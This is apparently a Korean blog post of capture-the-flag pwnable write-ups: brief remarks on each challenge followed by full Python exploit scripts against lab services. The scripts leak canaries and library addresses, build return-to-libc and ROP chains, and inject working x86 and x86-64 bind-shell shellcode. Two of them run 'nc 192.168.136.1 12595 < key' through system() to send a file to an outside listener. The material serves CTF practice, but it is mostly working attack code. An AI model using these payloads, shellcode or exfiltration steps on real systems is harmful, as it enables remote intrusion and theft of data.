푸는데 오래걸리지는 않았지만 릭이 안 되는 경우가 가끔 있어서 짜증났던 문제.

이걸 스택 스프레이라고 불러도 될지 모르겠지만 어쨌든 남아있는 영역에서 참조하는게 문제가 되는 케이스이므로 그렇게 썼다. 이제 Bookstore2도 해야 하고...과제도... 으아아


from hackutil import *
from socket import *
from time import *
from telnetlib import *
 
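HOST = '192.168.136.169'
PORT = 31330

#====================================================
# Distance from the leaked function pointer (funcptr1) back to the
# file-reading routine execution is redirected to; both are in the binary.
offset_func1_read = 0xd2
# Admin credentials of the CTF service (challenge data, not a real secret).
adminID = 'helloadmin'
adminPW = 'iulover!@#$'
# Seconds to wait for a reply.  Without a timeout a stalled service leaves
# recv() blocked forever.
RECV_TIMEOUT = 5.0
#====================================================


def _chat(sock, msg, bufsize=2046, delay=0.1):
    """Send `msg`, pause `delay` seconds and return the service's reply.

    The service has no prompt that can be waited on reliably, so the
    writeup's send / sleep / recv pacing is kept unchanged.
    """
    sock.send(msg)
    sleep(delay)
    return sock.recv(bufsize)


def _find_marker(data, marker):
    """Return the offset of `marker` in `data`, raising if it is absent.

    str.find() returns -1 on a miss; the original script sliced with that
    value and unpacked garbage as an address, which is what a "failed leak"
    looked like.  Failing loudly makes a re-run the obvious next step.
    """
    idx = data.find(marker)
    if idx < 0:
        raise RuntimeError("marker %r not found in service output; the leak "
                           "did not land, re-run the exploit" % (marker,))
    return idx


banner()

print("===================[ Phase 1 : Leak FuncPointer ]==================")

sock = socket(AF_INET, SOCK_STREAM)
sock.settimeout(RECV_TIMEOUT)
sock.connect((HOST, PORT))

# Admin login.
sock.recv(1024)
_chat(sock, adminID, 1024)
_chat(sock, adminPW, 1024)

# Add one book (menu 1) with minimal fields.
_chat(sock, '1\n')                    # addBook
_chat(sock, 'A')                      # name
_chat(sock, 'A')                      # desc
_chat(sock, '0\n')                    # back

# Modify book 0 (menu 2 -> 0 -> 3 = "all").  Stock/price are chosen so
# their little-endian int encodings read as the ASCII bytes '3333'/'4444'
# in the record dump below, where '3333' serves as a search marker.
_chat(sock, '2\n')                    # modify
_chat(sock, '0\n')
_chat(sock, '3\n')                    # all
_chat(sock, str(0x33333333) + '\n')   # stock -> '3333' marker
_chat(sock, str(0x34343434) + '\n')   # price -> '4444'
_chat(sock, '1\n')                    # ship
_chat(sock, '1\n')                    # available
_chat(sock, 'A' * 20)                 # name
_chat(sock, 'B' * 20)                 # description
_chat(sock, '0\n')                    # back

#============================================

# View (menu 4) dumps the record; the 4 bytes right after the '3333'
# marker are a function pointer into the binary.
sock.send('4\n')                      # view
sleep(0.1)
data = sock.recv(2048)
marker = _find_marker(data, '3333')
funcptr1 = up32(data[marker + 4:marker + 8])[0]
readFile = funcptr1 - offset_func1_read
print("[*] Find funcptr1 : " + hex(funcptr1))
print("[*] Find ReadFile : " + hex(readFile))


print("================[ Phase 2 : Attack with Stack Spray ]===============")

# Rewrite the name field (menu 2 -> 0 -> 1) with readFile's address
# repeated 125 times (500 bytes).  Per the writeup this is the "stack
# spray": a stale copy of this input is later dereferenced, so every
# 4-byte slot of it must point at readFile.
_chat(sock, '2\n')                    # modify
_chat(sock, '0\n')
_chat(sock, '1\n')                    # name
_chat(sock, p32(readFile) * 125)

#============================================

# Refill every field: the name is now the path readFile should open and
# the description a unique tag used to locate the key in the output.
_chat(sock, '3\n')                    # all
_chat(sock, '1234\n')                 # stock
_chat(sock, '1234\n')                 # price
_chat(sock, '0\n')                    # ship
_chat(sock, '1\n')                    # available
_chat(sock, '/home/bookstore/key\x00')    # name (file readFile opens)
_chat(sock, 'Fxxx_Bookstore')             # desc (search tag)

# Menu navigation exactly as in the writeup (no labels given there).
_chat(sock, '4\n')
_chat(sock, '1\n')
_chat(sock, '0\n')

_chat(sock, '3\n')                    # view

sock.send('0\n')
sleep(0.1)
data = sock.recv(2048)
# 14-byte tag plus one separator byte, then the key up to end of line.
key_start = _find_marker(data, 'Fxxx_Bookstore') + 15
key_end = data.find('\n', key_start)
if key_end < 0:
    key_end = len(data)
print("Key : " + data[key_start:key_end])

sock.close()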



별로 어렵지는 않았지만 argv[0]주소를 찾기 위해 브루트 포싱을 했더니 조금 귀찮았던 문제.

xinetd 데몬으로 돌아가고 있어서 쉘따기가 참 쉬웠다.


from hackutil import *
from socket import *
from time import *
from telnetlib import *
 
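HOST = '192.168.136.153'
PORT = 9880

#=======================================
# system@plt in the challenge binary (fixed 0x0804xxxx address).
system = 0x08048610
# Argument handed to system() in Phase 3; presumably where the "/bin/sh"
# injected in Phase 2 ends up - confirm against the binary.
freeadd = 0x0804b0E0
# Address placed after the 0x11d-byte overflow in Phase 1; the service
# prints the string found there, which is the password.
PASSWD_ADDR = 0x0804b060
# Seconds to wait on recv() before giving up instead of blocking forever.
RECV_TIMEOUT = 5.0
#=======================================


def _chat(sock, msg, delay=0.2, bufsize=1024):
    """Send `msg`, pause `delay` seconds and return the reply (writeup pacing)."""
    sock.send(msg)
    sleep(delay)
    return sock.recv(bufsize)


def _find_marker(data, marker):
    """Offset of `marker` in `data`; raise instead of slicing with -1 on a miss."""
    idx = data.find(marker)
    if idx < 0:
        raise RuntimeError("marker %r not found in service output %r"
                           % (marker, data))
    return idx


banner()

print("===================[ Phase 1 : Password leak ]==================")

s = socket(AF_INET, SOCK_STREAM)
s.settimeout(RECV_TIMEOUT)
s.connect((HOST, PORT))

s.recv(1024)
s.send('A' * 0x11d + p32(PASSWD_ADDR) + '\n')
sleep(0.1)
data = s.recv(1024)
start = _find_marker(data, "***: ") + 5
end = data.find(" terminated", start)
if end < 0:
    raise RuntimeError("no ' terminated' after the password in %r" % (data,))
passwd = data[start:end]
print("[*] Found Password : " + passwd)
s.close()   # the original left this first connection open

print("============[ Phase 2 : Ready to RTL, Canary leak ]=============")

s = socket(AF_INET, SOCK_STREAM)
s.settimeout(RECV_TIMEOUT)
s.connect((HOST, PORT))

s.recv(1024)
s.send(passwd + '\n')
s.recv(1024)
s.recv(1024)
_chat(s, '2\n')
_chat(s, '1\n')
_chat(s, '4\n')
# 0x15 bytes fill the buffer; the trailing '\n' presumably overwrites the
# canary's NUL low byte so the echo below runs on into the remaining three
# canary bytes (the zero byte is put back further down).
_chat(s, 'A' * 0x15 + '\n')
s.send('/bin/sh\x00\n')
print('[*] Inject "/bin/sh"')
sleep(0.2)
s.recv(1024)
s.send('Mini\n')
sleep(0.2)
data = s.recv(1024)
start = _find_marker(data, 'AAA\n') + 4
end = data.find('Wow', start)
if end < 0:
    raise RuntimeError("canary terminator 'Wow' not found in %r" % (data,))
canary = data[start:end]
# Restore the leading 0x00 byte(s) the echo did not carry.
if len(canary) < 4:
    canary = "\x00" * (4 - len(canary)) + canary
canary = up32(canary)[0]
print("[*] Found canary : " + hex(canary))

print("==================[ Phase 3 : Attack with RTL ]=================")

_chat(s, '3\n')
# buffer (0xd9) | canary | 0xC bytes up to the return address |
# system@plt | fake return address | argument (freeadd)
payload = ('A' * 0xd9 + p32(canary) + "A" * 0xC
           + p32(system) + "AAAA" + p32(freeadd))
print("[*] Length of Payload : " + str(len(payload)))
s.send(payload + '\n')
print("[*] Payload Injected")
sleep(1)
s.recv(1024)

_chat(s, '0\n')
_chat(s, '1\n')

print("===================[ Phase 4 : Got the shell ]==================")

# Clear the timeout before handing the socket to the interactive session,
# otherwise an idle shell raises socket.timeout.
s.settimeout(None)
t = Telnet()
t.sock = s
t.interact()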



왠지 스택이 릭되지 않는 문제가 가끔 있긴 한데 어쨌든 작동은 한다.

memcpy로 strcpy로 덮일 dest의 주소를 덮어서 원하는 주소에 값을 덮어쓰고, 이를 이용해 RET을 버퍼 주소로 이동시켜 NOP Sled를 타고 쉘코드가 실행되게 한다.


import time
from hackutil import *
from socket import *
from telnetlib import *
 
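HOST = "192.168.136.152"
PORT = 6666

#================================================================
# x86-64 bind shell: socket / bind / listen / accept / dup2 x3 /
# execve("/bin/sh") / exit.  The pushed sockaddr carries port 0x115c =
# 4444, which is where Phase 3 connects.
shellcode = ("\x31\xc0\x31\xdb\x31\xd2\xb0\x01\x89\xc6\xfe\xc0\x89\xc7\xb2"
        "\x06\xb0\x29\x0f\x05\x93\x48\x31\xc0\x50\x68\x02\x01\x11\x5c"
        "\x88\x44\x24\x01\x48\x89\xe6\xb2\x10\x89\xdf\xb0\x31\x0f\x05"
        "\xb0\x05\x89\xc6\x89\xdf\xb0\x32\x0f\x05\x31\xd2\x31\xf6\x89"
        "\xdf\xb0\x2b\x0f\x05\x89\xc7\x48\x31\xc0\x89\xc6\xb0\x21\x0f"
        "\x05\xfe\xc0\x89\xc6\xb0\x21\x0f\x05\xfe\xc0\x89\xc6\xb0\x21"
        "\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68"
        "\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89"
        "\xe6\xb0\x3b\x0f\x05\x50\x5f\xb0\x3c\x0f\x05")
# Bytes before the saved return address (also the size of the leak probe).
BUF_LEN = 0x108
# Listening port of the bind shell; must match the sockaddr in `shellcode`.
SHELL_PORT = 4444
# Seconds to wait on recv() before giving up instead of blocking forever.
RECV_TIMEOUT = 5.0
#================================================================


def _answer_prompts(sock):
    """Send the three fixed answers the service expects before the
    overflowable input (taken verbatim from the writeup)."""
    time.sleep(0.1)
    sock.send('arsenal\n')
    time.sleep(0.1)
    sock.recv(1024)
    sock.send('gyeongbokgung\n')
    time.sleep(0.1)
    sock.recv(1024)
    sock.send('psy\n')
    time.sleep(0.1)
    sock.recv(1024)


banner()

print("==================[ Phase 1 : Stack leak ]==================")
sock = socket(AF_INET, SOCK_STREAM)
sock.settimeout(RECV_TIMEOUT)
sock.connect((HOST, PORT))
_answer_prompts(sock)

# Fill the buffer with NULs; the reply echoes it back together with the
# 8 bytes that follow, which the writeup uses as a stack address.
sock.send("\x00" * BUF_LEN)
time.sleep(0.1)
reply = sock.recv(2048)
if len(reply) < BUF_LEN + 8:
    raise RuntimeError("leak reply is %d bytes, need %d; stack not leaked"
                       % (len(reply), BUF_LEN + 8))
stack = up64(reply[BUF_LEN:BUF_LEN + 8])[0]
print("[*] Find Stack : " + hex(stack))

sock.close()
print("=============[ Phase 2 : Attack with Shellcode ]============")

if len(shellcode) > BUF_LEN - 20:
    raise RuntimeError("shellcode (%d bytes) does not fit after the 20-byte sled"
                       % len(shellcode))
# 20-byte NOP sled, shellcode, NOP padding up to the return slot, then a
# return address 16 bytes past the leaked value (the writeup's offset into
# the sled).
payload = ("\x90" * 20 + shellcode
           + "\x90" * (BUF_LEN - 20 - len(shellcode)) + p64(stack + 16))
print("Payload Length : " + hex(len(payload)))

sock2 = socket(AF_INET, SOCK_STREAM)
sock2.settimeout(RECV_TIMEOUT)
sock2.connect((HOST, PORT))
_answer_prompts(sock2)
sock2.send(payload)
time.sleep(2)   # give the bind shell time to start listening

print("=================[ Phase 3 : Got the Shell ]================")

sock3 = socket(AF_INET, SOCK_STREAM)
sock3.connect((HOST, SHELL_PORT))
t = Telnet()
t.sock = sock3
t.interact()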



후, RTL로 RTL을 만드는 문제라고 하던 후배의 말이 뭔지 알수 있는 문제였다.

여러 가지 기법이 조합되어서 풀 수 있었던 문제.

RTL을 위한 인자를 직접 하나하나 다 만들고 쉘코드를 받아오고 RTL 도중 FEBP(Fake EBP)까지...

풀고나니 홀가분하고 나름 재미있었던 문제였다.


from hackutil import *
from socket import *
from time import *
from telnetlib import *
 
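HOST = '192.168.136.152'
PORT = 33227

#======================================
buf_len = 1020              # bytes up to the saved ebp
sprintf_plt = 0x0804887C
ppppr = 0x080499a5          # pop x4; ret.  +2 -> pop x2; ret, +3 -> pop; ret
bss = 0x0804ad44            # scratch area the fake read() frame is built in
freespace = 0x0804ab40      # where the shellcode is read to and jumped into
leave_ret = 0x08048b71      # mov esp,ebp; pop ebp; ret - the stack pivot
# One source address per byte of the 16-byte frame laid out in the comment
# block below.  Presumably each points at a location in the binary holding
# that byte followed by a NUL, so sprintf(bss+i, ret_arg[i]) copies exactly
# one byte - confirm against the binary.
ret_arg = [0x8048acc, 0x80499c3, 0x80499c4, 0x8049990,
           0x80499c4, 0x08049050, 0x08049050, 0x08049050,
           0x8048acc, 0x80499c3, 0x80499c4, 0x8049990,
           0x08049680, 0x08049050, 0x08049050, 0x08049050]
# x86 bind shell (socketcall socket/bind/listen/accept, dup2 loop,
# execve "/bin//sh"); the pushed port 0x0539 = 1337 is what Phase 2
# connects to.
shellcode = ("\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89"
            "\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39"
            "\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0"
            "\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56"
            "\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f"
            "\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68"
            "\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80")
read_plt = 0x0804893C
read_got = 0x0804AC98
SHELL_PORT = 1337
RECV_TIMEOUT = 5.0

# Frame read() presumably finds at `bss` after the pivot (from the writeup):
# RET = \x40\xab\x04\x08    (freespace)
# fd = \x04\x00\x00\x00
# target = \x40\xab\x04\x08 (freespace)
# length = \x54\x00\x00\x00
# NOTE(review): 0x54 = 84 bytes, but `shellcode` above is 89 bytes; if the
# length byte really is 0x54 the execve tail is truncated.  Verify which
# byte ret_arg[12] actually points at before relying on this.
#======================================


def _sprintf_frame(dst, src):
    """ROP frame for sprintf(dst, src); ppppr+2 pops both args on return."""
    return p32(sprintf_plt) + p32(ppppr + 2) + p32(dst) + p32(src)


banner()

print("===================[ Phase 1 : Attack with Shellcode ]==================")
s = socket(AF_INET, SOCK_STREAM)
s.settimeout(RECV_TIMEOUT)
s.connect((HOST, PORT))

payload = 'A' * buf_len + 'AAAA'                  # buffer + saved ebp
# Copy read()'s resolved libc address from its GOT slot to bss-4 ...
payload += _sprintf_frame(bss - 4, read_got)
# ... then build read()'s argument frame at bss, one byte per sprintf.
for i, src in enumerate(ret_arg):
    payload += _sprintf_frame(bss + i, src)
# pop ebp = bss-8; leave;ret then returns through bss-4, i.e. into read()
# with the frame just built (see the comment block above), and read()
# returns into freespace where the shellcode was stored.
payload += p32(ppppr + 3) + p32(bss - 8) + p32(leave_ret)
print("[*] Payload Length : " + str(len(payload)))
print("[*] Send payload")
# The overflow is in the request-line URL; the request is then completed
# with CRLF, and the shellcode is what the staged read() pulls in.
s.send('GET http://' + payload + ' HTTP/1.1')
sleep(1)
print("[*] Send \\r\\n")
s.send('\r\n')
sleep(1)
print("[*] Send Shellcode")
s.send(shellcode)
sleep(1)

print("======================[ Phase 2 : Got the Shell ]======================")
s2 = socket(AF_INET, SOCK_STREAM)
s2.connect((HOST, SHELL_PORT))
t = Telnet()
t.sock = s2
t.interact()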



처음에 볼땐 환경구축에 필요한 게 참 많길래 어려운 문젠가 싶었으나 오히려 Nuclear보다 쉽게 풀었다.

이번에는 쉘따려고 고생하지 않고 바로 key를 출력하도록 했다.

푸는데 걸린 시간 약 2시간 반...?


from hackutil import *
from socket import *
from time import *
 
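HOST = '192.168.136.139'
PORT = 8888

#==============================================
pppr = 0x08048b2c             # pop x3; ret - cleans three args after a call
ppppr = 0x080495bc            # unused here; kept from the writeup
read_plt = 0x08048620
read_got = 0x0804B010
write_plt = 0x080486E0
write_got = 0x0804B040        # unused here; kept from the writeup
libc_main_got = 0x0804B038
offset_read_system = 0x9aa40  # read - system; specific to the target's libc build
binsh = 0x0804970D            # printed only; the command run is read into bss
bss = 0x0804b080
# Descriptor the service talks to us on: the leak in Phase 2 arrives via
# write(CLIENT_FD, ...) and the command in Phase 3 via read(CLIENT_FD, ...).
CLIENT_FD = 4
# Command run by system() in Phase 3.  A listener must already be waiting
# on 192.168.136.1:12595 (e.g. `nc -l 12595`) or the key is lost.
EXFIL_CMD = 'nc 192.168.136.1 12595 < key'
# Seconds to wait on recv() before giving up instead of blocking forever.
RECV_TIMEOUT = 5.0
#==============================================


def _connect_menu4():
    """Open a fresh connection, wait out the banner and select menu 4,
    the input every payload below overflows.  The 2 s pause before the
    first recv() is kept from the writeup."""
    sock = socket(AF_INET, SOCK_STREAM)
    sock.settimeout(RECV_TIMEOUT)
    sock.connect((HOST, PORT))
    sleep(2)
    sock.recv(1024)
    sock.send('4')
    sleep(0.2)
    sock.recv(1024)
    return sock


def _recv_exact(sock, n):
    """Read exactly `n` bytes or raise if the peer stops short.

    The two write() calls in the Phase 2 chain may arrive as separate
    segments; a single recv() could return only the first 4 bytes and the
    original slice [4:8] would then feed an empty string to up32().
    """
    chunks = []
    got = 0
    while got < n:
        chunk = sock.recv(n - got)
        if not chunk:
            raise RuntimeError("connection closed after %d of %d leak bytes"
                               % (got, n))
        chunks.append(chunk)
        got += len(chunk)
    return ''.join(chunks)


banner()

print("===================[ Phase 1 : Canary leak ]==================")

s = _connect_menu4()

# Ten 'y's fill the buffer; the eleventh presumably overwrites the canary's
# NUL low byte so the echo runs on into the canary.
s.send('y' * 11)
sleep(0.1)
data = s.recv(1024)
if len(data) < 26:
    raise RuntimeError("echo too short (%d bytes), canary not leaked" % len(data))
# Mask the low byte back to 0x00 (it was replaced by the extra 'y').
canary = up32(data[22:26])[0] & 0xFFFFFF00
print("[*] Found Canary : " + hex(canary))
s.close()

print("==================[ Phase 2 : Library leak ]==================")

s = _connect_menu4()

# buffer | canary | 12 bytes up to the return address | ROP chain:
# write(fd, &read@got, 4); write(fd, &__libc_start_main@got, 4)
payload2 = 'y' * 10 + p32(canary) + 'A' * 12
payload2 += p32(write_plt) + p32(pppr) + p32(CLIENT_FD) + p32(read_got) + p32(4)
payload2 += p32(write_plt) + p32(pppr) + p32(CLIENT_FD) + p32(libc_main_got) + p32(4)

s.send(payload2)
sleep(0.1)

leak = _recv_exact(s, 8)
read_lib = up32(leak[0:4])[0]
libc_main_lib = up32(leak[4:8])[0]
system_lib = read_lib - offset_read_system

print("[*] Found read_lib : " + hex(read_lib))
print("[*] Found libc_main_lib : " + hex(libc_main_lib))
print("[*] Found system_lib : " + hex(system_lib))
print('[*] &"/bin/sh" : ' + hex(binsh))

s.close()

print("================[ Phase 3 : Attack with RTL ]=================")

s = _connect_menu4()

# read(fd, bss, 0x100) stages the command, then system(bss) runs it.
payload3 = 'y' * 10 + p32(canary) + 'A' * 12
payload3 += p32(read_plt) + p32(pppr) + p32(CLIENT_FD) + p32(bss) + p32(0x100)
payload3 += p32(system_lib) + "AAAA" + p32(bss)

s.send(payload3)
sleep(0.1)
# Explicit NUL so system() sees a terminated string regardless of what
# already sits in bss.
s.send(EXFIL_CMD + '\x00')
sleep(0.1)

s.close()

print("==================[ Phase 4 : Got the Key ]===================")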



대회에서 라이브러리 파일을 주고 시작했고, 따라서 로컬에서 디버깅이 가능한 상황이라고 가정하고 환경은

Ubuntu 14.04 64bit 로 구축해놓고 풀었습니다.

가장 기초적인 ROP로, daemon으로 돌아가는 프로그램이었기 때문에 system("/bin/sh")로 쉘을 딸 수 있었습니다.


from hackutil import *
from socket import *
from time import *
from telnetlib import *
 
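TARGET = '192.168.136.137'
PORT = 9999

#========================================
read_plt = 0x0804832c
read_got = 0x0804961c
write_plt = 0x0804830c
write_got = 0x08049614        # unused here; kept from the writeup
pppr = 0x080484b6             # pop x3; ret - cleans write()'s three args
vuln_func = 0x080483F4        # re-enter the overflowing function for payload 2
# Offsets are specific to the libc the writeup was solved against
# (Ubuntu 14.04, per the text above); recompute for any other target.
offset_read_system = 0x9aa40
offset_binsh_read = 0x85e54
# Bytes up to the saved return address (0x88 buffer + saved ebp).
BUF_OFF = 0x88 + 4
# Seconds to wait on recv() before giving up instead of blocking forever.
RECV_TIMEOUT = 5.0
#========================================


def _recv_exact(sock, n):
    """Read exactly `n` bytes or raise; a short read would otherwise reach
    up32() as a truncated string."""
    chunks = []
    got = 0
    while got < n:
        chunk = sock.recv(n - got)
        if not chunk:
            raise RuntimeError("connection closed after %d of %d leak bytes"
                               % (got, n))
        chunks.append(chunk)
        got += len(chunk)
    return ''.join(chunks)


banner()

print("==================[ Phase 1 : Find Library Func ]==================")

s = socket(AF_INET, SOCK_STREAM)
s.settimeout(RECV_TIMEOUT)
s.connect((TARGET, PORT))
# write(1, &read@got, 4) - fd 1 reaches us because the service runs with
# its stdio on the connection - then return into vuln_func so the same
# connection can take the second payload.
payload = "\x90" * BUF_OFF
payload += p32(write_plt)
payload += p32(pppr)
payload += p32(1)
payload += p32(read_got)
payload += p32(4)
payload += p32(vuln_func)    # vuln func again

s.send(payload)
sleep(0.1)
recved = _recv_exact(s, 4)

read_lib = up32(recved)[0]
system_lib = read_lib - offset_read_system
binsh = read_lib + offset_binsh_read

print("[*] Found read_lib : " + hex(read_lib))
sleep(0.3)
print("[*] Found system_lib : " + hex(system_lib))
sleep(0.3)
print("[*] Found binsh : " + hex(binsh))

print("===================[ Phase 2 : Attack with RTL ]===================")

# system("/bin/sh") with a throwaway return address.
payload2 = "\x90" * BUF_OFF
payload2 += p32(system_lib)
payload2 += "AAAA"
payload2 += p32(binsh)

s.send(payload2)
sleep(1)

print("====================[ Phase 3 : Got the Shell ]====================")

# Clear the timeout before the interactive session so an idle shell does
# not raise socket.timeout.
s.settimeout(None)
t = Telnet()
t.sock = s
t.interact()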
 



서버 환경을 몰라서 Ubuntu 14.04 64bit에 Full ASLR 환경으로 설정 후 풀었습니다.

원래 처음엔 mprotect 함수를 이용하여 쉘을 따려고 했으나 잘 되지 않아서 그냥 키 값만 읽어오도록 했습니다.

from hackutil import *
from time import *
from socket import *
 
# ==========================================
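HOST = '192.168.136.137'
PORT = 1129
leak = 'A' * 0x200            # filler echoed back together with the passcode
recv_plt = 0x080488E0
recv_got = 0x0804B074
send_plt = 0x08048900
ppppr = 0x0804917c            # pop x4; ret - cleans send()/recv()'s four args
vuln_func = 0x08048B5B        # re-entered after the leak so one connection suffices
data_ = 0x0804b090            # writable scratch area the command is received into
# Positive offset: system lies above recv in the libc this was solved
# against - build specific, recompute for any other target.
offset_system_recv = 0x1010
# The passcode appears this many bytes after the echoed 0x200 filler
# (observed in the writeup).
PASSCODE_OFF = 30
# Descriptor the service talks to us on (send()/recv() in the chains use it).
CLIENT_FD = 4
# Command run by system() in Phase 3.  A listener must already be waiting
# on 192.168.136.1:12595 (e.g. `nc -l 12595`) or the key is lost.
EXFIL_CMD = 'nc 192.168.136.1 12595 < key'
# Seconds to wait on recv() before giving up instead of blocking forever.
RECV_TIMEOUT = 5.0
# ==========================================


def _recv_exact(sock, n):
    """Read exactly `n` bytes or raise; a short read would otherwise reach
    up32() as a truncated string."""
    chunks = []
    got = 0
    while got < n:
        chunk = sock.recv(n - got)
        if not chunk:
            raise RuntimeError("connection closed after %d of %d leak bytes"
                               % (got, n))
        chunks.append(chunk)
        got += len(chunk)
    return ''.join(chunks)


banner()

print("==================[ Phase 1 : Passcode leak ]==================")

s = socket(AF_INET, SOCK_STREAM)
s.settimeout(RECV_TIMEOUT)
s.connect((HOST, PORT))
s.recv(1024)
s.send('target\n')
sleep(0.1)
s.recv(1024)
s.send('1234.12341234/1234.12341234\n')
sleep(0.1)
s.recv(1024)
s.send(leak + '\n')
sleep(0.1)
data = s.recv(1024)
start = len(leak) + PASSCODE_OFF
if len(data) < start + 4:
    raise RuntimeError("echo is %d bytes, need %d; passcode not leaked"
                       % (len(data), start + 4))
passcode = data[start:start + 4]
print("[*] passcode : " + passcode)
s.close()

print("================[ Phase 2 : Find Library Func ]================")

s2 = socket(AF_INET, SOCK_STREAM)
s2.settimeout(RECV_TIMEOUT)
s2.connect((HOST, PORT))
s2.recv(1024)
s2.send('launch\n')
sleep(0.1)
s2.recv(1024)

# buffer (0x20C) + saved ebp, then send(fd, &recv@got, 4, 0) and a return
# into vuln_func with a fake return address of 0 and argument 4 (presumably
# the client fd) so payload3 can go over the same connection.
payload2 = 'A' * (0x20C + 4)
payload2 += (p32(send_plt) + p32(ppppr) + p32(CLIENT_FD) + p32(recv_got)
             + p32(4) + p32(0))
payload2 += p32(vuln_func) + p32(0) + p32(4)

s2.send(passcode + "\n")
sleep(0.1)
s2.recv(1024)
s2.send(payload2)
sleep(0.1)
recv_lib = up32(_recv_exact(s2, 4))[0]
system_lib = recv_lib + offset_system_recv

print("[*] Found recv_lib : " + hex(recv_lib))
print("[*] Found system_lib : " + hex(system_lib))


print("=================[ Phase 3 : Attack with RTL ]=================")

# recv(fd, data_, 0xff, 0) stages the command, then system(data_) runs it.
payload3 = 'A' * (0x20c + 4)
payload3 += (p32(recv_plt) + p32(ppppr) + p32(CLIENT_FD) + p32(data_)
             + p32(0xff) + p32(0))
payload3 += p32(system_lib) + "AAAA" + p32(data_)

s2.send(payload3)
sleep(0.1)
# Explicit NUL so system() sees a terminated string regardless of what
# already sits at data_.
s2.send(EXFIL_CMD + '\x00')
sleep(0.1)
s2.close()
print("========================[ Got the Key ]========================")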

